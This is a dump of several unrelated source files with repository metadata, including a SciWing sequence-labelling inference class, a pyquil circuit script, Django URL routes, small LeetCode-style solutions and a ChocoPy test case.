from sciwing.utils.vis_seq_tags import VisTagging
from collections import defaultdict
from torch.utils.data import DataLoader
import pandas as pd
import pathlib
class SequenceLabellingInference(BaseSeqLabelInference):
def __init__(
self,
model: nn.Module,
model_filepath: str,
datasets_manager: DatasetsManager,
device: Optional[Union[str, torch.device]] = torch.device("cpu"),
predicted_tags_namespace_prefix: str = "predicted_tags",
):
super(SequenceLabellingInference, self).__init__(
model=model,
model_filepath=model_filepath,
datasets_manager=datasets_manager,
device=device,
)
self.predicted_tags_namespace_prefix = predicted_tags_namespace_prefix
self.labels_namespaces = self.datasets_manager.label_namespaces
self.msg_printer = wasabi.Printer()
self.metrics_calculator = TokenClassificationAccuracy(
datasets_manager=datasets_manager
)
# The key is the namespace of different labels
# The value is a dictioary of label->idx
self.label2idx_mapping: Dict[str, Dict[str, Any]] = {}
self.idx2label_mapping: Dict[str, Dict[str, Any]] = {}
for namespace in self.labels_namespaces:
self.label2idx_mapping[
namespace
] = self.datasets_manager.get_label_idx_mapping(label_namespace=namespace)
self.idx2label_mapping[
namespace
] = self.datasets_manager.get_idx_label_mapping(label_namespace=namespace)
self.output_analytics = None
self.output_df = None
self.batch_size = 32
self.load_model()
self.namespace_to_unique_categories = {}
self.namespace_to_visualizer = {}
for namespace in self.labels_namespaces:
categories = list(
set([label for label in self.label2idx_mapping[namespace].keys()])
)
visualizer = VisTagging(tags=categories)
self.namespace_to_unique_categories[namespace] = categories
self.namespace_to_visualizer[namespace] = visualizer
def run_inference(self):
with self.msg_printer.loading(text="Running inference on test data"):
loader = DataLoader(
dataset=self.datasets_manager.test_dataset,
batch_size=self.batch_size,
shuffle=False,
collate_fn=list,
)
# output analytics for every label namespace
output_analytics: Dict[str, Dict[str, Any]] = defaultdict(dict)
sentences = [] # all the sentences that is seen till now
predicted_tag_indices: Dict[str, list] = defaultdict(list)
# namespace -> all the tags that are predicted for the sentences
predicted_tag_names: Dict[str, list] = defaultdict(list)
true_tag_indices: Dict[str, list] = defaultdict(list)
true_tag_names: Dict[str, list] = defaultdict(list)
self.metrics_calculator.reset()
for lines_labels in loader:
lines_labels_ = list(zip(*lines_labels))
lines = lines_labels_[0]
labels = lines_labels_[1]
batch_sentences = [line.text for line in lines]
model_output_dict = self.model_forward_on_lines(lines=lines)
self.metrics_calculator.calc_metric(
lines=lines, labels=labels, model_forward_dict=model_output_dict
)
sentences.extend(batch_sentences)
(
predicted_tags,
predicted_tags_strings,
) = self.model_output_dict_to_prediction_indices_names(
model_output_dict=model_output_dict
)
true_tags, true_labels_strings = self.get_true_label_indices_names(
labels=labels
)
for namespace in self.labels_namespaces:
predicted_tag_indices[namespace].extend(predicted_tags[namespace])
predicted_tag_names[namespace].extend(
predicted_tags_strings[namespace]
)
true_tag_indices[namespace].extend(true_tags[namespace])
true_tag_names[namespace].extend(true_labels_strings[namespace])
for namespace in self.labels_namespaces:
output_analytics[namespace]["true_tag_indices"] = true_tag_indices[
namespace
]
output_analytics[namespace][
"predicted_tag_indices"
] = predicted_tag_indices[namespace]
output_analytics[namespace]["true_tag_names"] = true_tag_names[
namespace
]
output_analytics[namespace][
"predicted_tag_names"
] = predicted_tag_names[namespace]
output_analytics[namespace]["sentences"] = sentences
return output_analytics
def model_forward_on_lines(self, lines: List[Line]):
with torch.no_grad():
model_output_dict = self.model(
lines=lines,
labels=None,
is_training=False,
is_validation=False,
is_test=True,
)
return model_output_dict
def model_output_dict_to_prediction_indices_names(
self, model_output_dict: Dict[str, Any]
) -> (Dict[str, List[int]], Dict[str, List[str]]):
predicted_tags_indices_ = defaultdict(list)
predicted_tags_strings_ = defaultdict(list)
for namespace in self.labels_namespaces:
# List[List[str]]
batch_tags = model_output_dict[
f"{self.predicted_tags_namespace_prefix}_{namespace}"
]
predicted_tags_indices_[namespace].extend(batch_tags)
for predicted_tags in batch_tags:
predicted_tag_string = [
self.idx2label_mapping[namespace][predicted_tag_idx]
for predicted_tag_idx in predicted_tags
]
predicted_tag_string = " ".join(predicted_tag_string)
predicted_tags_strings_[namespace].append(predicted_tag_string)
return predicted_tags_indices_, predicted_tags_strings_
def get_true_label_indices_names(
self, labels: List[SeqLabel]
) -> (Dict[str, List[int]], Dict[str, List[str]]):
true_labels_indices = defaultdict(list)
true_labels_names = defaultdict(list)
for namespace in self.labels_namespaces:
for label in labels:
label_ = label.tokens[namespace]
label_ = [tok.text for tok in label_]
true_labels_names[namespace].append(" ".join(label_))
label_indices = [
self.label2idx_mapping[namespace][tok] for tok in label_
]
true_labels_indices[namespace].append(label_indices)
return true_labels_indices, true_labels_names
def report_metrics(self):
prf_tables = self.metrics_calculator.report_metrics()
for namespace in self.labels_namespaces:
self.msg_printer.divider(f"Report for {namespace}")
print(prf_tables[namespace])
def run_test(self):
self.output_analytics = self.run_inference()
self.output_df = pd.DataFrame(self.output_analytics)
def print_confusion_matrix(self):
""" This prints the confusion metrics for the entire dataset
Returns
-------
None
"""
for namespace in self.labels_namespaces:
# List[List[int]]
true_tags_indices = self.output_analytics[namespace]["true_tag_indices"]
predicted_tag_indices = self.output_analytics[namespace][
"predicted_tag_indices"
]
max_len_pred = max([len(pred_tags) for pred_tags in predicted_tag_indices])
max_len_true = max([len(true_tags) for true_tags in true_tags_indices])
# pad everything to the max len of both
max_len = max_len_pred if max_len_pred > max_len_true else max_len_true
numericalizer = self.datasets_manager.namespace_to_numericalizer[namespace]
padded_true_tag_indices = numericalizer.pad_batch_instances(
instances=true_tags_indices,
max_length=max_len,
add_start_end_token=False,
)
padded_predicted_tag_indices = numericalizer.pad_batch_instances(
instances=predicted_tag_indices,
max_length=max_len,
add_start_end_token=False,
)
labels_mask = numericalizer.get_mask_for_batch_instances(
instances=padded_true_tag_indices
)
# we have to pad the true tags indices and predicted tag indices all to max length
self.metrics_calculator.print_confusion_metrics(
true_tag_indices=padded_true_tag_indices,
predicted_tag_indices=padded_predicted_tag_indices,
labels_mask=labels_mask,
)
def get_misclassified_sentences(self, true_label_idx: int, pred_label_idx: int):
for namespace in self.labels_namespaces:
self.msg_printer.divider(f"Namespace {namespace.lower()}")
true_tag_indices = self.output_df[namespace].true_tag_indices
pred_tag_indices = self.output_df[namespace].predicted_tag_indices
indices = []
for idx, (true_tag_index, pred_tag_index) in enumerate(
zip(true_tag_indices, pred_tag_indices)
):
true_tags_pred_tags = zip(true_tag_index, pred_tag_index)
for true_tag, pred_tag in true_tags_pred_tags:
if true_tag == true_label_idx and pred_tag == pred_label_idx:
indices.append(idx)
break
for idx in indices:
sentence = self.output_analytics[namespace]["sentences"][idx].split()
true_labels = self.output_analytics[namespace]["true_tag_names"][
idx
].split()
pred_labels = self.output_analytics[namespace]["predicted_tag_names"][
idx
].split()
len_sentence = len(sentence)
true_labels = true_labels[:len_sentence]
pred_labels = pred_labels[:len_sentence]
stylized_string_true = self.namespace_to_visualizer[
namespace
].visualize_tokens(sentence, true_labels)
stylized_string_predicted = self.namespace_to_visualizer[
namespace
].visualize_tokens(sentence, pred_labels)
sentence = (
f"GOLD LABELS \n{'*' * 80} \n{stylized_string_true} \n\n"
f"PREDICTED LABELS \n{'*' * 80} \n{stylized_string_predicted}\n\n"
)
print(sentence)
def on_user_input(self, line: Union[Line, str]) -> Dict[str, List[str]]:
return self.infer_batch(lines=[line])
def infer_batch(self, lines: Union[List[Line], List[str]]) -> Dict[str, List[str]]:
lines_ = []
if isinstance(lines[0], str):
for line in lines:
line_ = self.datasets_manager.make_line(line=line)
lines_.append(line_)
else:
lines_ = lines
model_output_dict = self.model_forward_on_lines(lines=lines_)
_, pred_classnames = self.model_output_dict_to_prediction_indices_names(
model_output_dict
)
return pred_classnames
def generate_scienceie_prediction_folder(
self, dev_folder: pathlib.Path, pred_folder: pathlib.Path
):
""" Generates the predicted folder for the dataset in the test folder
for ScienceIE. This is very specific to ScienceIE. Not meant to use
with other tasks
ScienceIE is a SemEval Task that needs the files to be written into a
folder and it reports metrics by reading files from that folder. This
method generates the predicted folder given the dev folder
Parameters
----------
dev_folder : pathlib.Path
The path where the dev files are present
pred_folder : pathlib.Path
The path where the predicted files will be written
Returns
-------
"""
science_ie_data_utils = ScienceIEDataUtils(
folderpath=dev_folder, ignore_warnings=True
)
file_ids = science_ie_data_utils.get_file_ids()
for file_id in file_ids:
with self.msg_printer.loading(
f"Generating Science IE results for file {file_id}"
):
text = science_ie_data_utils.get_text_from_fileid(file_id)
sents = science_ie_data_utils.get_sents(text)
try:
assert bool(text.split()), f"File {file_id} does not have any text"
except AssertionError:
continue
try:
assert len(sents) > 0
except AssertionError:
continue
conll_filepath = pred_folder.joinpath(f"{file_id}.conll")
ann_filepath = pred_folder.joinpath(f"{file_id}.ann")
conll_lines = []
for sent in sents:
line = [token.text for token in sent]
line = " ".join(line)
prediction_classnames = self.on_user_input(line=line)
tag_names = [line.split()]
for namespace in ["TASK", "PROCESS", "MATERIAL"]:
# List[str] - List of predicted classnames
classnames_ = prediction_classnames[namespace][0].split()
tag_names.append(classnames_)
assert len(line.split()) == len(
classnames_
), f"len sent: {len(line.split())}, len task_tag_name: {len(classnames_)}"
zipped_text_tag_names = list(zip(*tag_names))
for text_tag_name in zipped_text_tag_names:
token, task_tag, process_tag, material_tag = text_tag_name
conll_line = " ".join(
[token, task_tag, process_tag, material_tag]
)
conll_lines.append(conll_line)
with open(conll_filepath, "w") as fp:
fp.writelines("\n".join(conll_lines))
fp.write("\n")
science_ie_data_utils.write_ann_file_from_conll_file(
conll_filepath=conll_filepath, ann_filepath=ann_filepath, text=text
)
| [
"abhinav@comp.nus.edu.sg"
] | abhinav@comp.nus.edu.sg |
66494b274cf67dfca2dac51e878dee4bf7d43575 | c8e6cf760a78ec45dbc2d3b6452e352d12da1f43 | /components/unified_consent/DEPS | 42423010fe2e8b1d84ae25a6998fb403a18a2558 | [
"BSD-3-Clause"
] | permissive | tojoyccnu/chromium | 15479d1d9e8159d5eecd61571d33effa78e573b7 | 8cba72403a712767289acb2c7cd06d1116db42cc | refs/heads/master | 2023-03-04T11:55:25.131615 | 2018-06-26T13:34:07 | 2018-06-26T13:34:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | include_rules = [
"+components/autofill/core/common",
"+components/browser_sync",
"+components/keyed_service/core",
"+components/pref_registry",
"+components/prefs",
"+components/sync/base",
"+services/identity/public/cpp",
]
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org | |
4bfcfba3cd42fe4b8758370453ea882fa441832f | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p4VQE/R3/benchmark/startPyquil724.py | ea617cb370afcd2e188b6722dbf150be0426ed29 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,254 | py | # qubit number=4
# total number=15
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += H(0) # number=1
prog += H(1) # number=2
prog += H(2) # number=3
prog += CNOT(0,2) # number=12
prog += X(2) # number=13
prog += CNOT(0,2) # number=14
prog += Y(3) # number=5
prog += SWAP(1,0) # number=7
prog += H(1) # number=11
prog += SWAP(1,0) # number=8
prog += Y(0) # number=9
prog += Y(0) # number=10
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil724.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
fe019310e5d9258fe9c864c492fea1db00791b9c | c9dc1ddbcf752318ab5ee42bc997493fbe6c6689 | /electrum_mue/plugins/ledger/cmdline.py | 5c7be960031d3f307d6ba4ea81368a298583e087 | [
"MIT"
] | permissive | Hser2bio/electrum-mue | 7ea770bda0ddfbf81bdda6627e4be2745700ec00 | 5369056b54e862826b6c3132d15ecd3a3d6b6bc0 | refs/heads/master | 2020-12-10T15:13:15.878787 | 2020-01-13T15:37:30 | 2020-01-13T15:37:30 | 233,629,634 | 0 | 0 | MIT | 2020-01-13T15:36:34 | 2020-01-13T15:36:33 | null | UTF-8 | Python | false | false | 402 | py | from electrum_mue.plugin import hook
from .ledger import LedgerPlugin
from ..hw_wallet import CmdLineHandler
class Plugin(LedgerPlugin):
handler = CmdLineHandler()
@hook
def init_keystore(self, keystore):
if not isinstance(keystore, self.keystore_class):
return
keystore.handler = self.handler
def create_handler(self, window):
return self.handler
| [
"sotblad@monetaryunit.org"
] | sotblad@monetaryunit.org |
1db9f9e97f277b0a457c123937a3ea8789882f42 | 30258c8e9c35a21fa3ef13c68dfddd23c56568d6 | /interview_bit/arrays/anti_diagnolas.py | fdf867d0fdc3c9ea09ddccd923fa617706d4387d | [] | no_license | venkatachiranjeevi/algorithms | 3e6d525be36ee34f969d49959df1aaad35fcb1d5 | 83724f647102acba00dd028a81e09888ce980785 | refs/heads/master | 2021-06-11T05:23:57.080523 | 2020-04-14T05:16:20 | 2020-04-14T05:16:20 | 128,548,617 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | __author__ = 'venkat'
class Solution:
def diagonal(self, a):
n = len(a)
if n < 2 :
return a
res = []
for i in range((2*(n-1))+1):
temp = []
for j in range(i+1):
if j < n and i-j< n:
temp.append(a[j][i-j])
res.append(temp)
return res
# a = [[1,2,3],[4,5,6],[7,8,9]]
a = [[1,2],[3,4]]
print Solution().diagonal(a) | [
"chiranjeevi.kokku@tjnovandi.com"
] | chiranjeevi.kokku@tjnovandi.com |
f4cd19786978a0c6c8debd52439fa372b7109bce | a8750439f200e4efc11715df797489f30e9828c6 | /LeetCodeContests/53/53_691.py | 511d5fe0c21fd406c29fae78a7dd7384e353ebbe | [] | no_license | rajlath/rkl_codes | f657174305dc85c3fa07a6fff1c7c31cfe6e2f89 | d4bcee3df2f501349feed7a26ef9828573aff873 | refs/heads/master | 2023-02-21T10:16:35.800612 | 2021-01-27T11:43:34 | 2021-01-27T11:43:34 | 110,989,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,441 | py | '''
691. Stickers to Spell Word
User Accepted: 81
User Tried: 374
Total Accepted: 86
Total Submissions: 948
Difficulty: Hard
We are given N different types of stickers. Each sticker has a lowercase English word on it.
You would like to spell out the given target string by cutting individual letters from your collection of stickers and
rearranging them.
You can use each sticker more than once if you want, and you have infinite quantities of each sticker.
What is the minimum number of stickers that you need to spell out the target? If the task is impossible, return -1.
Example 1:
Input:
["with", "example", "science"], "thehat"
Output:
3
Explanation:
We can use 2 "with" stickers, and 1 "example" sticker.
After cutting and rearrange the letters of those stickers, we can form the target "thehat".
Also, this is the minimum number of stickers necessary to form the target string.
Example 2:
Input:
["notice", "possible"], "basicbasic"
Output:
-1
Explanation:
We can't form the target "basicbasic" from cutting letters from the given stickers.
Note:
stickers has length in the range [1, 50].
stickers consists of lowercase English words (without apostrophes).
target has length in the range [1, 15], and consists of lowercase English letters.
In all test cases, all words were chosen randomly from the 1000 most common US English words, and the target was chosen as a concatenation of two random words.
The time limit may be more challenging than usual. It is expected that a 50 sticker test case can be solved within 35ms on average.
'''
class Solution:
def minStickers(self, stickers, target):
"""
:type stickers: List[str]
:type target: str
:rtype: int
"""
dp = [0] * (1 << 15)
dp[0]=0
n = len(target)
N = 1 << n
for i in range(N):
if dp[i] == -1 : continue
for j in range(len(stickers)):
curr = i
for k in range(len(stickers[j])):
for r in range(n):
if curr >> r and 1 : continue
if target[r]==stickers[j][k]:
curr = curr or (1<<r)
break
if (dp[curr] ==-1) or (dp[curr] > (dp[i]+1)):
dp[curr] = dp[i] + 1
return dp[N - 1]
sol = Solution()
print(sol.minStickers(["with", "example", "science"], "thehat"))
| [
"raj.lath@gmail.com"
] | raj.lath@gmail.com |
9d8f8b6b297bf6b3d3394f9bb85ee1b6ec510681 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nnascet.py | 66f37df8ca8a54d0f67848e02c441b22984b608c | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 373 | py | ii = [('BentJDO2.py', 2), ('WilbRLW.py', 1), ('LeakWTI2.py', 1), ('LeakWTI3.py', 6), ('LyttELD.py', 1), ('CoopJBT2.py', 2), ('AinsWRR3.py', 1), ('CoolWHM.py', 1), ('ClarGE.py', 1), ('NewmJLP.py', 1), ('CoopJBT.py', 1), ('LeakWTI4.py', 1), ('MedwTAI2.py', 7), ('HogaGMM.py', 1), ('CoolWHM3.py', 1), ('ClarGE3.py', 2), ('TaylIF.py', 20), ('KeigTSS.py', 1), ('BentJDO.py', 7)] | [
"varunwachaspati@gmail.com"
] | varunwachaspati@gmail.com |
308783007d464e193ded9e1583032d78d99f45ff | c3a3ae45f6fb22bdb3c622498c7ff1c2c2732f6a | /day16/s12day16/app01/urls.py | d745ed753408795ea2d072a92291eb19df1d6edb | [] | no_license | huyuedong/S12 | df6b56cf05bb9f9c4a6e54b6a5228f1715e20245 | 61aa6d91f4e70f87c9b4c4b1e2042d5eeb2e2c3d | refs/heads/master | 2020-12-14T08:50:57.514965 | 2016-07-30T01:45:03 | 2016-07-30T01:45:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | """s12day16 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from app01 import views
urlpatterns = [
url(r'^$', views.payment_index),
url(r'cash/$', views.payment_by_cash),
url(r'page1/$', views.page1),
url(r'page1_1/$', views.page1_1),
]
| [
"liwenzhou7@gmail.com"
] | liwenzhou7@gmail.com |
a12029068bf685dcc7c11d2d1ccc4063dd8dbc54 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/pa3/sample/object_attr_get-108.py | e8818fd053b17f5f19744393b5a5a6900ba499ca | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | class A(object):
a:int = 42
class B(A):
b:bool = True
def __init__(self:"B"):
print("B")
a:A = None
b:B = None
a = b = B()
print(a.a)
print(b.$ID)
print(b.b)
| [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.